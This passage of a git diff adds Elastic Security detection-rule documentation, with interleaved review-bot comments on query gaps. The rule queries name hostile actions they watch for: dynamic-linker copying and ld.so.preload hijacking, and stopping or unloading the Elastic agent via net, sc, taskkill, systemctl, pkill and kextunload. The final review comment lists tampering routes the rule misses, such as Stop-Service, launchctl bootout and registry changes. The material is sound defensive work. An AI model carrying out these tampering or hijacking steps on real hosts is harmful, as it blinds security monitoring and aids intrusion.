"?:\\Users\\*\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe", + "?:\\Users\\*\\AppData\\Local\\Programs\\Opera*\\opera.exe", + "?:\\Users\\*\\AppData\\Local\\Programs\\Fiddler\\Fiddler.exe", + "?:\\Users\\*\\AppData\\Local\\PowerToys\\PowerToys.exe", + "?:\\Users\\*\\AppData\\Local\\Vivaldi\\Application\\vivaldi.exe", + "?:\\Users\\*\\AppData\\Local\\Zen Browser\\zen.exe", + "?:\\Users\\*\\Wavesor Software\\WaveBrowser\\wavebrowser.exe", + "?:\\Windows\\System32\\MicrosoftEdgeCP.exe", + "?:\\Windows\\system32\\mobsync.exe", + "?:\\Windows\\SysWOW64\\mobsync.exe", + "?:\\Windows\\system32\\svchost.exe", + "?:\\Windows\\System32\\smartscreen.exe", + "?:\\Windows\\System32\\wsl.exe", + "?:\\Windows\\System32\\WWAHost.exe" + ) + ) or + + /* Discord App */ + (process.name : "Discord.exe" and 
(process.code_signature.subject_name : "Discord Inc." and + process.code_signature.trusted == true) and dns.question.name : ("discord.com", "cdn.discordapp.com", "discordapp.com") + ) or + + /* MS Sharepoint / OneDrive */ + (process.name : ("Microsoft.SharePoint.exe", "OneDrive.Sync.Service.exe") and dns.question.name : "onedrive.live.com" and + (process.code_signature.subject_name : "Microsoft Corporation" and process.code_signature.trusted == true) + ) or + + /* Obsidian - Plugins are stored on raw.githubusercontent.com */ + (process.name : "Obsidian.exe" and (process.code_signature.subject_name : "Dynalist Inc" and + process.code_signature.trusted == true) and dns.question.name : "raw.githubusercontent.com" + ) or + + /* WebExperienceHostApp */ + (process.name : "WebExperienceHostApp.exe" and (process.code_signature.subject_name : "Microsoft Windows" and + process.code_signature.trusted == true) and dns.question.name : ("onedrive.live.com", "skyapi.onedrive.live.com") + ) or + + /* IntelliJ IDEA connecting to raw.githubusercontent.com */ + (process.code_signature.subject_name : "JetBrains s.r.o." 
and + process.code_signature.trusted == true and dns.question.name : ("api.github.com", "raw.githubusercontent.com") + ) or + + (process.code_signature.subject_name : "Microsoft *" and process.code_signature.trusted == true and + dns.question.name : ("*.sharepoint.com", "graph.microsoft.com", "g.live.com", "login.live.com", + "*.blob.core.windows.net", "*.blob.storage.azure.net") + ) or + + (process.code_signature.subject_name : ("Python Software Foundation", "Anaconda, Inc.") and + process.code_signature.trusted == true and dns.question.name : "files.pythonhosted.org" + ) or + + /* Zoom */ + (process.name : "Zoom.exe" and ( + process.code_signature.subject_name : ("Zoom Video Communications, Inc.", "Zoom Communications, Inc.") and + process.code_signature.trusted == true) and dns.question.name : ("www.googleapis.com", "graph.microsoft.com") + ) or + + /* VSCode */ + (process.name : "Code.exe" and (process.code_signature.subject_name : "Microsoft Corporation" and + process.code_signature.trusted == true) and dns.question.name : ("api.github.com", "raw.githubusercontent.com") + ) or + + /* Terraform */ + (process.name : "terraform-provider*.exe" and (process.code_signature.subject_name : "HashiCorp, Inc." 
and + process.code_signature.trusted == true) and dns.question.name : "graph.microsoft.com" + ) or + + ( + process.code_signature.trusted == true and + process.code_signature.subject_name : ( + "Johannes Schindelin", + "Redis Inc.", + "Slack Technologies, LLC", + "Cisco Systems, Inc.", + "Dropbox, Inc", + "Amazon.com Services LLC", + "Island Technology Inc.", + "GitHub, Inc.", + "Red Hat, Inc", + "Mozilla Corporation" + ) + ) + ) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Command and Control +** ID: TA0011 +** Reference URL: https://attack.mitre.org/tactics/TA0011/ +* Technique: +** Name: Web Service +** ID: T1102 +** Reference URL: https://attack.mitre.org/techniques/T1102/ +* Technique: +** Name: Dynamic Resolution +** ID: T1568 +** Reference URL: https://attack.mitre.org/techniques/T1568/ +* Sub-technique: +** Name: Domain Generation Algorithms +** ID: T1568.002 +** Reference URL: https://attack.mitre.org/techniques/T1568/002/ +* Technique: +** Name: Proxy +** ID: T1090 +** Reference URL: https://attack.mitre.org/techniques/T1090/ +* Sub-technique: +** Name: External Proxy +** ID: T1090.002 +** Reference URL: https://attack.mitre.org/techniques/T1090/002/ +* Tactic: +** Name: Exfiltration +** ID: TA0010 +** Reference URL: https://attack.mitre.org/tactics/TA0010/ +* Technique: +** Name: Exfiltration Over Web Service +** ID: T1567 +** Reference URL: https://attack.mitre.org/techniques/T1567/ +* Sub-technique: +** Name: Exfiltration to Code Repository +** ID: T1567.001 +** Reference URL: https://attack.mitre.org/techniques/T1567/001/ +* Sub-technique: +** Name: Exfiltration to Cloud Storage +** ID: T1567.002 +** Reference URL: https://attack.mitre.org/techniques/T1567/002/ 
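Review bot: The dns.question.name list in this hunk carries duplicate entries ("api.mylnikov.org" and "api.notion.com" each appear twice), and the first exception group excludes "?:\\Program Files\\*.exe" and "?:\\Program Files (x86)\\*.exe" by path alone, whereas every other exception in the query also requires process.code_signature.trusted == true. Any executable under those directories is therefore exempt regardless of signature, which the guide's sentence "processes outside known legitimate program locations" does not make clear to the analyst tuning exceptions. Since this file is generated from the rule source, the fix belongs there: drop the duplicates and, if the rule maintainers agree, pair the Program Files exclusion with `process.code_signature.trusted == true`; at minimum the guide should state that the Program Files exclusion is location-based only, e.g. `Processes running from Program Files are excluded by path alone; verify the signature of any binary found there during triage.`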
diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-detection-alert-on-a-process-exhibiting-cpu-spike.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-detection-alert-on-a-process-exhibiting-cpu-spike.asciidoc
new file mode 100644
index 0000000000..f4dbe3f900
--- /dev/null
+++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-detection-alert-on-a-process-exhibiting-cpu-spike.asciidoc
@@ -0,0 +1,174 @@ +[[prebuilt-rule-8-19-18-detection-alert-on-a-process-exhibiting-cpu-spike]] +=== Detection Alert on a Process Exhibiting CPU Spike + +This rule correlates security alerts with processes exhibiting unusually high CPU utilization on the same host and process ID within a short time window. This behavior may indicate malicious activity such as malware execution, cryptomining, exploit payload execution, or abuse of system resources following initial compromise. + +*Rule type*: esql + +*Rule indices*: None + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Use Case: Threat Detection +* Rule Type: Higher-Order Rule +* Resources: Investigation Guide +* Domain: Endpoint +* Tactic: Impact + +*Version*: 4 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Detection Alert on a Process Exhibiting CPU Spike* + + +This rule identifies processes that both triggered a security alert and exhibited unusually high CPU utilization on the +same host and process ID within a short time window. This combination may indicate malicious execution, resource abuse, or +post-compromise activity. + + +*Possible investigation steps* + +- Review the correlated alert(s) to understand why the process was flagged by Elastic Defend. +- Examine the process name, command line, and SHA-256 hash to determine whether the process is expected or known to be malicious. +- Validate the observed CPU usage and duration to determine whether the spike is abnormal for this process and host. +- Check for related process activity such as parent/child processes, suspicious process spawning, or privilege escalation attempts. 
+- Review additional host telemetry including: + - Network connections initiated by the process + - File creation or modification events + - Persistence mechanisms (services, scheduled tasks, registry keys) +- Determine whether similar activity is observed on other hosts, which may indicate a broader compromise. + + +*False positive analysis* + +- Legitimate high-CPU processes such as software updates, backup agents, security scans, or system maintenance tasks. +- Resource-intensive but benign applications (e.g., compilers, video encoding, data processing jobs). +- Security tools or monitoring agents temporarily consuming high CPU. + + +*Response and remediation* + +- If malicious activity is confirmed, isolate the affected host to prevent further impact. +- Terminate the offending process if safe to do so. +- Remove any identified malicious binaries or artifacts and eliminate persistence mechanisms. +- Apply relevant patches or configuration changes to remediate the root cause. +- Monitor the environment for recurrence of similar high-CPU processes combined with security alerts. +- Escalate the incident if multiple hosts or indicators suggest coordinated or widespread activity. + +==== Setup + + + +*Setup* + + +This rule requires host CPU metrics collected via the Elastic Agent **System** integration. + + +*System Metrics Integration Setup* + +The System integration collects host-level metrics such as CPU usage, load, memory, and process statistics and sends them to Elasticsearch using Elastic Agent. + + +*Prerequisite Requirements:* + +- Elastic Agent managed by Fleet +- A Fleet Server configured and reachable + Refer to the Fleet Server setup guide: + https://www.elastic.co/guide/en/fleet/current/fleet-server.html + + +*The following steps should be executed in order to enable CPU metrics collection:* + +- Go to the Kibana home page and click **Add integrations**. +- In the search bar, enter **System** and select the **System** integration. 
+- Click **Add System**. +- Configure an integration name and optionally add a description. +- Under **Metrics**, ensure the following datasets are enabled: + - `system.cpu` + - `system.load` (optional but recommended) + - `system.process` (optional, if process-level CPU is required) +- Review optional and advanced settings as needed. +- Add the integration to an existing agent policy or create a new agent policy. +- Deploy the Elastic Agent to the hosts from which CPU metrics should be collected. +- Click **Save and Continue** to finalize the setup. + + +*Validation* + +After deployment, verify CPU metrics ingestion by confirming the presence of documents in: +- `metrics-system.cpu-*` +- `metrics-system.load-*` (if enabled) + +For more details on the System integration and available metrics, refer to the documentation: +https://docs.elastic.co/integrations/system + + +==== Rule query + + +[source, js] +---------------------------------- +FROM metrics-*, .alerts-security.* METADATA _index +| where not KQL("""kibana.alert.rule.tags : "Rule Type: Higher-Order Rule" """) +| eval + // processes with more than 70% total CPU use + cpu_metrics_pids = CASE(_index like ".ds-metrics-system.process-*" and system.process.cpu.total.norm.pct >= 0.7, process.pid, null), + // any security alert with process.name and ID populated excluding low severity ones + alerts_pids = CASE(_index like ".internal.alerts-security.*" and kibana.alert.rule.name is not null and process.name is not null and process.pid is not null and host.id is not null and kibana.alert.risk_score > 21, process.pid, null) +| stats pid_with_cpu_spike = COUNT_DISTINCT(cpu_metrics_pids), pid_with_alerts = COUNT_DISTINCT(alerts_pids), + Esql.max_cpu_pct = MAX(system.process.cpu.total.norm.pct), + Esql.alerts = VALUES(kibana.alert.rule.name), + Esql.process_hash_sha256 = VALUES(process.hash.sha256), + process_path = VALUES(process.executable), + parent_process_path = VALUES(process.parent.executable), + user_name = 
VALUES(user.name),
+ host_name = VALUES(host.name),
+ cmdline = VALUES(process.command_line) by process.pid, process.name, host.id
+| where pid_with_cpu_spike > 0 and pid_with_alerts > 0
+// populate fields to use in rule exceptions
+| eval process.hash.sha256 = MV_FIRST(Esql.process_hash_sha256),
+ process.executable = MV_FIRST(process_path),
+ process.parent.executable = MV_FIRST(parent_process_path),
+ process.command_line = MV_FIRST(cmdline),
+ user.name = MV_FIRST(user_name),
+ host.name = MV_FIRST(host_name)
+| KEEP user.name, host.id, host.name, process.*, Esql.*
+| where `process.executable` != "C:\\Program Files\\ESET\\ESET Security\\ekrn.exe" and
+ `process.executable` != "C:\\Windows\\System32\\CompatTelRunner.exe" and
+ `process.executable` != "C:\\Program Files\\UiPath\\Studio\\UiPath.ActivityCompiler.CommandLine.exe"
+
+----------------------------------
+
+*Framework*: MITRE ATT&CK^TM^
+
+* Tactic:
+** Name: Impact
+** ID: TA0040
+** Reference URL: https://attack.mitre.org/tactics/TA0040/
diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-dynamic-linker-copy.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-dynamic-linker-copy.asciidoc
new file mode 100644
index 0000000000..4f390b81fb
--- /dev/null
+++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-dynamic-linker-copy.asciidoc
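Review bot: The Setup section marks the `system.process` dataset as "optional, if process-level CPU is required", but the query's cpu_metrics_pids branch is computed only from documents where `_index like ".ds-metrics-system.process-*"` with `system.process.cpu.total.norm.pct >= 0.7`, so without that dataset pid_with_cpu_spike is always 0 and the rule can never fire. The bullet should read `- \`system.process\` (required: the rule reads \`system.process.cpu.total.norm.pct\`)` and the Validation list should also name `metrics-system.process-*`. Separately, the correlation key `by process.pid, process.name, host.id` spans the lookback window, so PID reuse by a same-named process on a busy host can pair an alert with an unrelated process; the False positive analysis section would benefit from a sentence saying so.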
@@ -0,0 +1,197 @@ +[[prebuilt-rule-8-19-18-dynamic-linker-copy]] +=== Dynamic Linker Copy + +Detects the copying of the Linux dynamic loader binary and subsequent file creation for the purpose of creating a backup copy. This technique was seen recently being utilized by Linux malware prior to patching the dynamic loader in order to inject and preload a malicious shared object file. This activity should never occur and if it does then it should be considered highly suspicious or malicious. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.file* +* logs-endpoint.events.process* +* logs-sentinel_one_cloud_funnel.* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.intezer.com/blog/incident-response/orbit-new-undetected-linux-threat/ + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Persistence +* Threat: Orbit +* Data Source: Elastic Defend +* Data Source: SentinelOne +* Resources: Investigation Guide + +*Version*: 215 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Dynamic Linker Copy* + + +The Linux dynamic linker is responsible for loading shared libraries required by executables at runtime. It is a critical component of the Linux operating system and should not be tampered with. + +Adversaries may attempt to copy the dynamic linker binary and create a backup copy before patching it to inject and preload malicious shared object files. This technique has been observed in recent Linux malware attacks and is considered highly suspicious or malicious. 
+ +The detection rule 'Dynamic Linker Copy' is designed to identify such abuse by monitoring for processes with names "cp" or "rsync" that involve copying the dynamic linker binary ("/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2") and modifying the "/etc/ld.so.preload" file. Additionally, the rule checks for the creation of new files with the "so" extension on Linux systems. By detecting these activities within a short time span (1 minute), the rule aims to alert security analysts to potential malicious behavior. + +> **Note**: +> This investigation guide uses the https://www.elastic.co/guide/en/security/current/invest-guide-run-osquery.html[Osquery Markdown Plugin] introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide. +> This investigation guide uses https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html[placeholder fields] to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run. + + +*Possible investigation steps* + + +- Investigate the dynamic linker that was copied or altered. 
+ - !{osquery{"label":"Osquery - Retrieve File Listing Information","query":"SELECT * FROM file WHERE ( path = '/etc/ld.so.preload' OR path = '/lib64/ld-linux-x86-64.so.2' OR path =\n'/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2' OR path = '/usr/lib64/ld-linux-x86-64.so.2' OR path =\n'/usr/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2' )\n"}} + - !{osquery{"label":"Osquery - Retrieve Additional File Listing Information","query":"SELECT f.path, u.username AS file_owner, g.groupname AS group_owner, datetime(f.atime, 'unixepoch') AS\nfile_last_access_time, datetime(f.mtime, 'unixepoch') AS file_last_modified_time, datetime(f.ctime, 'unixepoch') AS\nfile_last_status_change_time, datetime(f.btime, 'unixepoch') AS file_created_time, f.size AS size_bytes FROM file f LEFT\nJOIN users u ON f.uid = u.uid LEFT JOIN groups g ON f.gid = g.gid WHERE ( path = '/etc/ld.so.preload' OR path =\n'/lib64/ld-linux-x86-64.so.2' OR path = '/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2' OR path =\n'/usr/lib64/ld-linux-x86-64.so.2' OR path = '/usr/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2' )\n"}} +- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations. + - !{osquery{"label":"Osquery - Retrieve Running Processes by User","query":"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username"}} +- Investigate other alerts associated with the user/host during the past 48 hours. +- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations. +- Investigate whether the altered scripts call other malicious scripts elsewhere on the file system. + - If scripts or executables were dropped, retrieve the files and determine if they are malicious: + - Use a private sandboxed malware analysis system to perform analysis. 
+ - Observe and collect information about the following activities: + - Attempts to contact external domains and addresses. + - Check if the domain is newly registered or unexpected. + - Check the reputation of the domain or IP address. + - File access, modification, and creation activities. +- Investigate abnormal behaviors by the subject process/user such as network connections, file modifications, and any other spawned child processes. + - Investigate listening ports and open sockets to look for potential command and control traffic or data exfiltration. + - !{osquery{"label":"Osquery - Retrieve Listening Ports","query":"SELECT pid, address, port, socket, protocol, path FROM listening_ports"}} + - !{osquery{"label":"Osquery - Retrieve Open Sockets","query":"SELECT pid, family, remote_address, remote_port, socket, state FROM process_open_sockets"}} + - Identify the user account that performed the action, analyze it, and check whether it should perform this kind of action. + - !{osquery{"label":"Osquery - Retrieve Information for a Specific User","query":"SELECT * FROM users WHERE username = {{user.name}}"}} +- Investigate whether the user is currently logged in and active. + - !{osquery{"label":"Osquery - Investigate the Account Authentication Status","query":"SELECT * FROM logged_in_users WHERE user = {{user.name}}"}} + + +*False positive analysis* + + +- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary. +- Any activity that triggered the alert and is not inherently malicious must be monitored by the security team. +- The security team should address any potential benign true positive (B-TP), as this configuration can put the user and the domain at risk. +- Try to understand the context of the execution by thinking about the user, machine, or business purpose. A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need. 
+ + +*Related Rules* + + +- Modification of Dynamic Linker Preload Shared Object Inside A Container - 342f834b-21a6-41bf-878c-87d116eba3ee +- Modification of Dynamic Linker Preload Shared Object - 717f82c2-7741-4f9b-85b8-d06aeb853f4f +- Shared Object Created or Changed by Previously Unknown Process - aebaa51f-2a91-4f6a-850b-b601db2293f4 + + +*Response and Remediation* + + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved host to prevent further post-compromise behavior. +- If the triage identified malware, search the environment for additional compromised hosts. + - Implement temporary network rules, procedures, and segmentation to contain the malware. + - Stop suspicious processes. + - Immediately block the identified indicators of compromise (IoCs). + - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). + + +==== Setup + + + +*Setup* + + +This rule requires data coming in from Elastic Defend. + + +*Elastic Defend Integration Setup* + +Elastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app. 
+ + +*Prerequisite Requirements:* + +- Fleet is required for Elastic Defend. +- To configure Fleet Server refer to the https://www.elastic.co/guide/en/fleet/current/fleet-server.html[documentation]. + + +*The following steps should be executed in order to add the Elastic Defend integration on a Linux System:* + +- Go to the Kibana home page and click "Add integrations". +- In the query bar, search for "Elastic Defend" and select the integration to see more details about it. +- Click "Add Elastic Defend". +- Configure the integration name and optionally add a description. +- Select the type of environment you want to protect, either "Traditional Endpoints" or "Cloud Workloads". +- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html[Helper guide]. +- We suggest selecting "Complete EDR (Endpoint Detection and Response)" as a configuration setting, that provides "All events; all preventions" +- Enter a name for the agent policy in "New agent policy name". If other agent policies already exist, you can click the "Existing hosts" tab and select an existing policy instead. +For more details on Elastic Agent configuration settings, refer to the https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html[helper guide]. +- Click "Save and Continue". +- To complete the integration, select "Add Elastic Agent to your hosts" and continue to the next section to install the Elastic Agent on your hosts. +For more details on Elastic Defend refer to the https://www.elastic.co/guide/en/security/current/install-endpoint.html[helper guide]. 
+
+
+==== Rule query
+
+
+[source, js]
+----------------------------------
+sequence by process.entity_id with maxspan=1m
+ [process where host.os.type == "linux" and event.type == "start" and process.name in ("cp", "rsync", "mv") and
+ process.args in (
+ "/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2", "/etc/ld.so.preload", "/lib64/ld-linux-x86-64.so.2",
+ "/usr/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2", "/usr/lib64/ld-linux-x86-64.so.2"
+ ) and
+ not process.args like ("/var/tmp/mkinitramfs*", "/var/tmp/dracut*", "/tmp/mkinitcpio*")]
+[file where host.os.type == "linux" and event.action == "creation" and (file.extension == "so" or file.name like "*.so.*")]
+
+----------------------------------
+
+*Framework*: MITRE ATT&CK^TM^
+
+* Tactic:
+** Name: Persistence
+** ID: TA0003
+** Reference URL: https://attack.mitre.org/tactics/TA0003/
+* Technique:
+** Name: Hijack Execution Flow
+** ID: T1574
+** Reference URL: https://attack.mitre.org/techniques/T1574/
+* Sub-technique:
+** Name: Dynamic Linker Hijacking
+** ID: T1574.006
+** Reference URL: https://attack.mitre.org/techniques/T1574/006/
diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-elastic-agent-service-terminated.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-elastic-agent-service-terminated.asciidoc
new file mode 100644
index 0000000000..71b1ce4455
--- /dev/null
+++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-elastic-agent-service-terminated.asciidoc
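Review bot: The investigation guide earlier in this hunk describes the rule as matching processes named "cp" or "rsync" and new files with the "so" extension, but the query also matches `process.name in ("cp", "rsync", "mv")` and `file.name like "*.so.*"`, and it checks five loader/preload paths rather than the single path the guide quotes. The guide sentence should be brought in line with the query, e.g. `monitoring for processes named "cp", "rsync", or "mv" whose arguments reference the dynamic loader or "/etc/ld.so.preload", followed within one minute by creation of a file with the "so" extension or a versioned ".so." name`. It is also worth stating in the guide that the process.args list covers x86-64 loader paths only, so hosts using other architectures' loaders (for example ld-linux-aarch64.so.1) fall outside this rule's coverage and are not a sign the rule is tuned out.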
@@ -0,0 +1,155 @@ +[[prebuilt-rule-8-19-18-elastic-agent-service-terminated]] +=== Elastic Agent Service Terminated + +Identifies the Elastic endpoint agent has stopped and is no longer running on the host. Adversaries may attempt to disable security monitoring tools in an attempt to evade detection or prevention capabilities during an intrusion. This may also indicate an issue with the agent itself and should be addressed to ensure defensive measures are back in a stable state. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* OS: Windows +* OS: macOS +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Data Source: Elastic Defend +* Resources: Investigation Guide + +*Version*: 113 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Elastic Agent Service Terminated* + + +The Elastic Agent is a crucial component for monitoring and securing endpoints across various operating systems. It ensures continuous security oversight by collecting and analyzing data. Adversaries may attempt to disable this agent to evade detection, compromising system defenses. The detection rule identifies suspicious termination activities by monitoring specific processes and commands across Windows, Linux, and macOS, flagging potential defense evasion attempts. 
+ + +*Possible investigation steps* + + +- Review the event logs to identify the exact process and command used to terminate the Elastic Agent, focusing on the process names and arguments such as "net.exe", "sc.exe", "systemctl", and "pkill" with arguments like "stop", "uninstall", or "disable". +- Check the timeline of events around the termination to identify any preceding suspicious activities or anomalies that might indicate an adversary's presence or actions. +- Investigate the user account associated with the process termination to determine if it was authorized or if there are signs of account compromise. +- Examine the host for any other signs of tampering or compromise, such as unauthorized changes to system configurations or the presence of other malicious processes. +- Verify the current status of the Elastic Agent on the affected host and attempt to restart it if it is not running, ensuring that security monitoring is restored. +- Correlate this event with other alerts or logs from the same host or network to identify potential patterns or coordinated attack activities. + + +*False positive analysis* + + +- Routine maintenance activities may trigger the rule if administrators use commands like systemctl or service to stop the Elastic Agent for updates or configuration changes. To manage this, create exceptions for known maintenance windows or authorized personnel. +- Automated scripts or deployment tools that temporarily disable the Elastic Agent during software installations or updates can cause false positives. Identify these scripts and whitelist their execution paths or specific arguments. +- Testing environments where Elastic Agent is frequently started and stopped for development purposes might generate alerts. Exclude these environments by specifying their hostnames or IP addresses in the rule exceptions. 
+- Security tools or processes that interact with the Elastic Agent, such as backup solutions or system monitoring tools, might inadvertently stop the service. Review these interactions and adjust the rule to ignore specific process names or arguments associated with these tools. +- User-initiated actions, such as troubleshooting or system performance optimization, may involve stopping the Elastic Agent. Educate users on the impact of these actions and establish a protocol for notifying the security team when such actions are necessary. + + +*Response and remediation* + + +- Immediately isolate the affected host from the network to prevent further unauthorized access or potential lateral movement by adversaries. +- Verify the status of the Elastic Agent on the affected host and attempt to restart the service. If the service fails to restart, investigate potential causes such as corrupted files or missing dependencies. +- Conduct a thorough review of recent process execution logs on the affected host to identify any unauthorized or suspicious activities that may have led to the termination of the Elastic Agent. +- If malicious activity is confirmed, perform a comprehensive malware scan and remove any identified threats. Ensure that the host is clean before reconnecting it to the network. +- Review and update endpoint security configurations to prevent unauthorized termination of security services. This may include implementing stricter access controls or using application whitelisting. +- Escalate the incident to the security operations team for further analysis and to determine if additional hosts are affected or if there is a broader security incident underway. +- Document the incident, including all actions taken and findings, to enhance future response efforts and update incident response plans as necessary. 
+ +==== Setup + + + +*Setup* + + +If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, +events will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2. +Hence for this rule to work effectively, users will need to add a custom ingest pipeline to populate +`event.ingested` to @timestamp. +For more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html + + +==== Rule query + + +[source, js] +---------------------------------- +process where event.type == "start" and +( + /* net, sc or wmic stopping or deleting Elastic Agent on Windows */ + ( + process.name : ("net.exe", "sc.exe", "wmic.exe","powershell.exe","taskkill.exe","PsKill.exe","ProcessHacker.exe") and + process.args : ("stopservice","uninstall", "stop", "disabled","Stop-Process","terminate","suspend") and + process.args : ("elasticendpoint", "Elastic Agent","elastic-agent","elastic-endpoint") + ) or + + /* service or systemctl used to stop Elastic Agent on Linux */ + ( + process.name in ("systemctl", "service", "chkconfig", "update-rc.d") and + process.args : ("elastic-agent", "elastic-agent.service", "ElasticEndpoint") and + process.args : ("stop", "disable", "remove", "off", "kill", "mask") and + not ( + process.parent.executable : "/opt/Elastic/Agent/data/elastic-agent-*/components/previous/elastic-endpoint" and + process.parent.args : "uninstall" and + process.parent.args : "--keepstate" + ) + ) or + + /* pkill, killall used to stop Elastic Agent or Endpoint on Linux */ + (process.name in ("pkill", "killall", "kill") and process.args : ("elastic-agent", "elastic-endpoint")) or + + /* Unload Elastic Defend extension on MacOS */ + (process.name : "kextunload" and process.args : "com.apple.iokit.EndpointSecurity") +) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference 
URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Impair Defenses +** ID: T1562 +** Reference URL: https://attack.mitre.org/techniques/T1562/ +* Sub-technique: +** Name: Disable or Modify Tools +** ID: T1562.001 +** Reference URL: https://attack.mitre.org/techniques/T1562/001/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-elastic-defend-alert-followed-by-telemetry-loss.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-elastic-defend-alert-followed-by-telemetry-loss.asciidoc new file mode 100644 index 0000000000..7570bef3dd --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-elastic-defend-alert-followed-by-telemetry-loss.asciidoc 
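Review bot: The PowerShell branch of the query does not match the most direct way of stopping a Windows service from PowerShell: `Stop-Service` is absent from the first `process.args` list, which only carries `Stop-Process`, so `powershell.exe Stop-Service "Elastic Agent"` never matches even though `"Elastic Agent"` is in the second list. One-line fix: `process.args : ("stopservice","uninstall","stop","disabled","Stop-Process","Stop-Service","terminate","suspend") and`. The macOS branch only watches `kextunload` of `com.apple.iokit.EndpointSecurity`; if Elastic Defend on current macOS ships as a system extension rather than a kext (as I believe it does), `launchctl bootout`/`unload` and `systemextensionsctl uninstall` against the Elastic daemons are the realistic tampering paths and would not fire this rule. Because every branch keys on a process start, a stop performed through the Services MMC, a registry `Start` value change or a direct agent-file deletion is also silent; the investigation guide should say that the companion telemetry-loss rule is the backstop for those cases.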
